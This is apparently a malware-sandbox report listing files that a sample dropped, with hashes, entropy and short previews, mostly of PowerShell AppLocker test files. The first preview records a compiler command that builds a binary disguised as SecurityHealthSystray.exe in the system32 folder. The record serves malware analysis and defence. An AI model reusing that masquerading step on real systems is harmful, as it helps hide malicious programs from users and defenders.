                                              MD5:92EC7C08EB686CE764DA53701077137B
                                              SHA1:A3468D0C61AFFBF5D3FEEAB7D5DB6AFFF919BADE
                                              SHA-256:971F1F6B4081CD5E734853EF156D4B8454EB613E4917B8AB49FF76D845A8C8B1
                                              SHA-512:1C48E7776F96B5549B59D994B3DD693F7F1D04A26D1CF28F73A420DE95BF8E52CD282513919F582E19AACCBF6798352D6A214E2C3E5F388E5072C7010C51ED5B
                                              Malicious:false
                                              Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\4gjcegjf\4gjcegjf.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                              C:\Users\user\AppData\Local\Temp\D8sJXR219P

                                              Download File
                                              Process:C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):25
                                              Entropy (8bit):4.403856189774723
                                              Encrypted:false
                                              SSDEEP:3:BPeJyoPhz:sJykz
                                              MD5:16D01EEF965A086F7BFE559E1FEAD19F
                                              SHA1:7FABF17FC4A4FE7350E26EF3404F81631F77D072
                                              SHA-256:73CDB20B5671AD72FA9B2D45D1672EA9A842E1AF85927A4787B0EFC312C674AB
                                              SHA-512:03295E9E9E06B2ACFFA76FE2DAB1D3F660F55F249E29DD37F2F389B24B88CE51BAC8610F71DC04FA019EDB2192CAC04EC574B358641BA427127D7090691B0D0D
                                              Malicious:false
                                              Preview:DX0jR5wcM9bupxaANtMjGgXq1

                                              C:\Users\user\AppData\Local\Temp\RES6986.tmp

                                              Download File
                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                              File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6d4, 10 symbols, created Thu Sep 12 19:38:22 2024, 1st section name ".debug$S"
                                              Category:modified
                                              Size (bytes):1932
                                              Entropy (8bit):4.626429212904413
                                              Encrypted:false
                                              SSDEEP:48:XaLzDaaZdKOZm6lmuulB+hnqXSfbNtmh5N:KnDaWKOc62TkZzNty5N
                                              MD5:A9B02E2EE1E5435B331ED0EEAB267B2E
                                              SHA1:AC68CC4518A7C0325614959192F078FA0EEBFC7D
                                              SHA-256:BD0C2958D72FEDFC07CD08F05CDD5E4E8F36B768494F22E6390E780FE47EA4D6
                                              SHA-512:88AF34C51603623A515AD6BB19E92D0740FD0D7B471D2F95F06201865A8FB2B10916A63966365F7258D4BC5B493B57F10ACC43F48F4E2AC954445AF3DD0B5758
                                              Malicious:false
                                              Preview:L....C.f.............debug$S........\...................@..B.rsrc$01............................@..@.rsrc$02........8...................@..@........[....c:\Program Files (x86)\Microsoft\Edge\Application\CSC2072A4DD6B9C45BD955850FB555C1F90.TMP....................q.QK.......N..........7.......C:\Users\user~1\AppData\Local\Temp\RES6986.tmp.-.<....................a..Microsoft (R) CVTRES.b.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...................... .......8.......................P.......................h.......................................................D...............................................D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.

                                              C:\Users\user\AppData\Local\Temp\RES6B99.tmp

                                              Download File
                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                              File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6ec, 10 symbols, created Thu Sep 12 19:38:23 2024, 1st section name ".debug$S"
                                              Category:modified
                                              Size (bytes):1956
                                              Entropy (8bit):4.578011667038515
                                              Encrypted:false
                                              SSDEEP:24:HkO9GXOIZHjwKOZmN0luxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0+QlUZ:FIZUKOZmyluOulajfqXSfbNtmh1Z
                                              MD5:D11CDF5B59DC194625A144C9BE599DB2
                                              SHA1:80EA986C44A962CA7CBDA120B32190D6D43CB545
                                              SHA-256:E3BB0052A4E46C601C84D5895A84E34B3DA0286F0EF673D18E9409299EA23C46
                                              SHA-512:C881D14C61DD99631FB8C397C50ACFDB6109700202E708CEA1AFF93DBE2AE7D6325AE87AA580277BC7AF52B5D8F0951BE415215D5D0C868BE615414E4878C2D7
                                              Malicious:false
                                              Preview:L.../C.f.............debug$S........<...................@..B.rsrc$01................h...........@..@.rsrc$02........p...|...............@..@........<....c:\Windows\System32\CSC5918AA24663347D392372538DC1C654.TMP..................r.av..t.y..............7.......C:\Users\user~1\AppData\Local\Temp\RES6B99.tmp.-.<....................a..Microsoft (R) CVTRES.b.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...................... .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_00csp1qu.j1r.psm1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0oif1dsx.uve.psm1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0qqzap4l.1bc.ps1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_14am2ujt.mnd.ps1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2aqaxz3p.uqu.psm1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2em0x4wo.sne.ps1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2hlkbxbv.aap.psm1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3kdvepdw.tzn.ps1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_41l2j3vk.pyf.ps1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4351dt3b.ipf.psm1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_52kbtqvy.luv.ps1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5f43rykj.0tu.psm1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5gsoqixf.rs2.ps1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5w1jmdz2.kcx.ps1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ag4nc4jy.w1l.psm1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b2mj0cib.trx.psm1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b4howfov.qlc.ps1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bqzissmn.tgp.psm1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bu5mgobs.zcx.psm1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bzelos0l.ryq.psm1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cinf2y2o.ddh.psm1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ckqr4ntk.3t5.psm1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_co02irpn.hcm.ps1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d304wvhs.l2u.ps1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_el1lfhuo.o2x.ps1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gdbso2lt.idc.ps1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
